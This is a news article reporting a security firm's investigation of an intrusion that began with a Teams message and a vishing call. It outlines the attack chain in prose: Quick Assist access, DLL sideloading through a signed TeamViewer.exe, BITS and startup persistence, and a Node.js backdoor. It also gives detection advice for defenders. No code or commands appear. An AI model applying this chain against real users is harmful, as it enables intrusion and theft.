Microsoft Teams Vishing Used to Deploy Malware via TeamViewer

Ontinue’s Cyber Defense Centre (CDC) recently investigated an incident that shows how a simple vishing call can turn into a full environment compromise. The attack combined social engineering with legitimate tools like Quick Assist, signed binaries, and malicious scripts to gain access, maintain persistence, and avoid detection.

A Teams Message and a Phone Call

The attack began with a Microsoft Teams message sent from what looked like a legitimate external user. Alongside that came a vishing call designed to build trust and guide the target into running a PowerShell command. That command downloaded a payload, the first stage of a larger chain. Quick Assist, a legitimate remote support tool built into Windows, was then used by the attacker to gain remote access.

Tools Used: Legitimate, Trusted and Misused

Once inside, the attacker dropped a signed binary, TeamViewer.exe, to a hidden folder. That executable was used to sideload a malicious DLL (TV.dll), helping to blend in with normal system activity. This type of sideloading isn’t new, but it remains effective, especially when using signed and widely trusted applications.

According to the company’s blog post shared with Hackread.com ahead of its release on Tuesday, the attacker set up a shortcut file in the startup folder to make sure the malware would automatically run again every time the system rebooted. Meanwhile, they also used BITS jobs (Background Intelligent Transfer Service) to transfer files quietly to maintain access for up to 90 days.

The second stage involved a JavaScript-based backdoor (index.js) executed through Node.js. This gave the attacker full command-and-control access via a socket connection, complete with command execution capabilities and hardcoded credentials.

Although the CDC couldn’t confirm attribution with high confidence, the tactics observed in this attack closely resemble those associated with Storm-1811, a group previously identified by Microsoft.

The similarities include the use of Quick Assist for remote access, sideloading malicious DLLs via signed binaries, exploiting Microsoft Teams as an entry point, and relying on living-off-the-land techniques using built-in Windows tools. These overlaps align with recent findings from both Microsoft and Sophos, which documented similar vishing-driven campaigns involving abuse of remote support software.

Social Engineering: The Root Cause

The attack’s success depended on one thing: social engineering. The initial vishing call was the key that opened the door. Ontinue’s 2H Threat Intelligence Report already highlighted a 1633% increase in vishing attacks in Q1 2025, and this incident is proof that those numbers are more than just stats.

Jason Soroko, Senior Fellow at Sectigo, a Scottsdale-based certificate management provider, shared his perspective with Hackread.com, stating, “This attack started with a Teams vishing attempt that led to a signed binary slipping past defenses. The attacker sideloaded a malicious DLL into a trusted process, turning standard remote support into a stealthy entry point.”

“Defenders should watch for PowerShell commands in Teams messages, unexpected use of Quick Assist, and signed binaries like TeamViewer.exe running from unusual paths. Signs of DLL sideloading, such as TV.dll loading unexpectedly, are also red flags,” he added.

This case is a reminder that threat actors don’t always need zero-days or malware. When users trust unfamiliar voices and messages, and when familiar tools are misused, attackers can do serious damage using what’s already available on the system.